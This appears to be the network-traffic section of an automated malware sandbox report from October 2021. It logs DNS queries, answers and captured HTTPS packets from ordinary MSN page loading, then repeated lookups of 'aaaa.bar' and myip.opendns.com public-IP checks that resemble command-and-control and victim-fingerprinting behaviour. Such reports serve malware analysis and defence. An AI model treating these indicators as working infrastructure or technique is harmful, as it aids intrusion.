                                                              Oct 20, 2021 15:08:35.327625990 CEST5516153192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:35.347404957 CEST53551618.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:35.864444971 CEST5475753192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:35.886532068 CEST53547578.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:38.127250910 CEST4999253192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:38.147479057 CEST53499928.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:38.603321075 CEST6007553192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:38.624269009 CEST53600758.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:40.389971972 CEST6434553192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:42.134711981 CEST5712853192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:42.155055046 CEST53571288.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:50.150769949 CEST5479153192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:50.176003933 CEST53547918.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:50.207711935 CEST5046353192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:50.230431080 CEST53504638.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:08:51.055684090 CEST5039453192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:55.795512915 CEST5853053192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:55.814032078 CEST53585308.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:10:41.611599922 CEST53544508.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:10:41.696527004 CEST53592618.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:10:48.063822031 CEST53571518.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:10:54.487529039 CEST53594138.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:01.904071093 CEST5643253192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:01.930294037 CEST53564328.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:02.095237970 CEST5292953192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:02.116945028 CEST53529298.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:08.391160011 CEST6431753192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:08.409462929 CEST53643178.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:14.814949036 CEST5689553192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:14.839359999 CEST53568958.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:39.636048079 CEST5751553192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:39.637876987 CEST5819953192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:12:39.655416965 CEST53575158.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:39.655639887 CEST53581998.8.8.8192.168.2.5
                                                              Oct 20, 2021 15:12:39.658279896 CEST5820053192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.660295963 CEST5820153192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.674038887 CEST5358200208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.675090075 CEST5820253192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.675980091 CEST5358201208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.676615000 CEST5820353192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.690810919 CEST5358202208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.692991972 CEST5358203208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.697055101 CEST5820453192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.697527885 CEST5820553192.168.2.5208.67.222.222
                                                              Oct 20, 2021 15:12:39.712977886 CEST5358204208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.713160992 CEST5358205208.67.222.222192.168.2.5
                                                              Oct 20, 2021 15:12:39.970794916 CEST53652218.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Oct 20, 2021 15:08:30.124794960 CEST192.168.2.58.8.8.80x9bedStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:34.783061028 CEST192.168.2.58.8.8.80x9bf0Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:35.327625990 CEST192.168.2.58.8.8.80x4079Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:35.864444971 CEST192.168.2.58.8.8.80x8e2aStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:38.127250910 CEST192.168.2.58.8.8.80x427Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:38.603321075 CEST192.168.2.58.8.8.80x2333Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:40.389971972 CEST192.168.2.58.8.8.80x8204Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:42.134711981 CEST192.168.2.58.8.8.80x5b7bStandard query (0)btloader.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.150769949 CEST192.168.2.58.8.8.80xb143Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.207711935 CEST192.168.2.58.8.8.80xd300Standard query (0)ad-delivery.netA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:51.055684090 CEST192.168.2.58.8.8.80x4857Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.795512915 CEST192.168.2.58.8.8.80xd38fStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:01.904071093 CEST192.168.2.58.8.8.80xabcbStandard query (0)aaaa.barA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:02.095237970 CEST192.168.2.58.8.8.80x7101Standard query (0)aaaa.barA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:08.391160011 CEST192.168.2.58.8.8.80xbb42Standard query (0)aaaa.barA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:14.814949036 CEST192.168.2.58.8.8.80x3bf8Standard query (0)aaaa.barA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.636048079 CEST192.168.2.58.8.8.80x8546Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.637876987 CEST192.168.2.58.8.8.80x1e25Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.658279896 CEST192.168.2.5208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.660295963 CEST192.168.2.5208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.675090075 CEST192.168.2.5208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.676615000 CEST192.168.2.5208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.697055101 CEST192.168.2.5208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                              Oct 20, 2021 15:12:39.697527885 CEST192.168.2.5208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Oct 20, 2021 15:08:30.142769098 CEST8.8.8.8192.168.2.50x9bedNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:34.812608957 CEST8.8.8.8192.168.2.50x9bf0No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:35.347404957 CEST8.8.8.8192.168.2.50x4079No error (0)contextual.media.net23.211.6.95A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:35.886532068 CEST8.8.8.8192.168.2.50x8e2aNo error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:35.886532068 CEST8.8.8.8192.168.2.50x8e2aNo error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:38.147479057 CEST8.8.8.8192.168.2.50x427No error (0)hblg.media.net23.211.6.95A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:38.624269009 CEST8.8.8.8192.168.2.50x2333No error (0)lg3.media.net23.211.6.95A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:40.407922983 CEST8.8.8.8192.168.2.50x8204No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:42.155055046 CEST8.8.8.8192.168.2.50x5b7bNo error (0)btloader.com104.26.7.139A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:42.155055046 CEST8.8.8.8192.168.2.50x5b7bNo error (0)btloader.com104.26.6.139A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:42.155055046 CEST8.8.8.8192.168.2.50x5b7bNo error (0)btloader.com172.67.70.134A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.176003933 CEST8.8.8.8192.168.2.50xb143No error (0)ad.doubleclick.netdart.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.176003933 CEST8.8.8.8192.168.2.50xb143No error (0)dart.l.doubleclick.net172.217.168.38A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.230431080 CEST8.8.8.8192.168.2.50xd300No error (0)ad-delivery.net104.26.3.70A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.230431080 CEST8.8.8.8192.168.2.50xd300No error (0)ad-delivery.net172.67.69.19A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:50.230431080 CEST8.8.8.8192.168.2.50xd300No error (0)ad-delivery.net104.26.2.70A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:51.086312056 CEST8.8.8.8192.168.2.50x4857No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:51.086312056 CEST8.8.8.8192.168.2.50x4857No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.814032078 CEST8.8.8.8192.168.2.50xd38fNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.814032078 CEST8.8.8.8192.168.2.50xd38fNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.814032078 CEST8.8.8.8192.168.2.50xd38fNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.814032078 CEST8.8.8.8192.168.2.50xd38fNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:08:55.814032078 CEST8.8.8.8192.168.2.50xd38fNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:01.930294037 CEST8.8.8.8192.168.2.50xabcbNo error (0)aaaa.bar31.220.111.98A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:02.116945028 CEST8.8.8.8192.168.2.50x7101No error (0)aaaa.bar31.220.111.98A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:08.409462929 CEST8.8.8.8192.168.2.50xbb42No error (0)aaaa.bar31.220.111.98A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:14.839359999 CEST8.8.8.8192.168.2.50x3bf8No error (0)aaaa.bar31.220.111.98A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.655416965 CEST8.8.8.8192.168.2.50x8546No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.655639887 CEST8.8.8.8192.168.2.50x1e25No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.674038887 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.674038887 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.674038887 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.675980091 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.675980091 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.675980091 CEST208.67.222.222192.168.2.50x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.690810919 CEST208.67.222.222192.168.2.50x2No error (0)myip.opendns.com102.129.143.33A (IP address)IN (0x0001)
                                                              Oct 20, 2021 15:12:39.692991972 CEST208.67.222.222192.168.2.50x2No error (0)myip.opendns.com102.129.143.33A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • https:
                                                                • geolocation.onetrust.com
                                                                • btloader.com
                                                                • ad-delivery.net
                                                                • ad.doubleclick.net
                                                                • img.img-taboola.com
                                                              • aaaa.bar

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.549784104.20.184.68443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:35 UTC0OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                              Accept: application/javascript, */*;q=0.8
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: geolocation.onetrust.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:35 UTC0INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Oct 2021 13:08:35 GMT
                                                              Content-Type: text/javascript
                                                              Content-Length: 182
                                                              Connection: close
                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                              Server: cloudflare
                                                              CF-RAY: 6a1279ccae526967-FRA
                                                              2021-10-20 13:08:35 UTC0INData Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 47 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 36 33 33 31 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 39 33 37 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 32 30 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b
                                                              Data Ascii: jsonFeed({"country":"CH","state":"ZG","stateName":"Zug","zipcode":"6331","timezone":"Europe/Zurich","latitude":"47.19370","longitude":"8.42020","city":"Hunenberg","continent":"EU"});


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.549821104.26.7.139443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:42 UTC0OUTGET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                              Accept: application/javascript, */*;q=0.8
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: btloader.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:42 UTC1INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Oct 2021 13:08:42 GMT
                                                              Content-Type: application/javascript
                                                              Content-Length: 10157
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=1800, must-revalidate
                                                              Etag: "643eb1aad6ba3932ca744b96ffc00048"
                                                              Vary: Origin
                                                              Via: 1.1 google
                                                              CF-Cache-Status: HIT
                                                              Age: 214
                                                              Accept-Ranges: bytes
                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rXekkW5gTi%2FA5lu%2FUbkZIA0V299R8U3gevFM6pvQsILGWOKSkrjKdwnSjAH3cMUxNzOU4X6D%2FqmFv1PlaTyG3cvGeawQ7WWDHt8kQcPVb4%2FU3OYgrYBfJlVgywKmpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 6a1279f47c095c9e-FRA
                                                              2021-10-20 13:08:42 UTC1INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f
                                                              Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
                                                              2021-10-20 13:08:42 UTC2INData Raw: 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76
                                                              Data Ascii: t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.v
                                                              2021-10-20 13:08:42 UTC3INData Raw: 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d
                                                              Data Ascii: ||window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}
                                                              2021-10-20 13:08:42 UTC5INData Raw: 64 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 70 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d
                                                              Data Ascii: dexOf(n.toLowerCase()))&&(t=!0,p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,dom
                                                              2021-10-20 13:08:42 UTC6INData Raw: 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74
                                                              Data Ascii: n(e){var t=c.bundles[e];i[e]={min:Math.trunc(100*(+o+0)),max:Math.trunc(100*(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100*(s+u*a)),max:Math.t
                                                              2021-10-20 13:08:42 UTC7INData Raw: 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6f 29 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65
                                                              Data Ascii: ndow.dispatchEvent(o)}catch(e){}var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;re
                                                              2021-10-20 13:08:42 UTC9INData Raw: 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69
                                                              Data Ascii: ontent")||p.contentEnabled,p.mobileContentEnabled="true"==localStorage.getItem("forceMobileContent")||p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|i
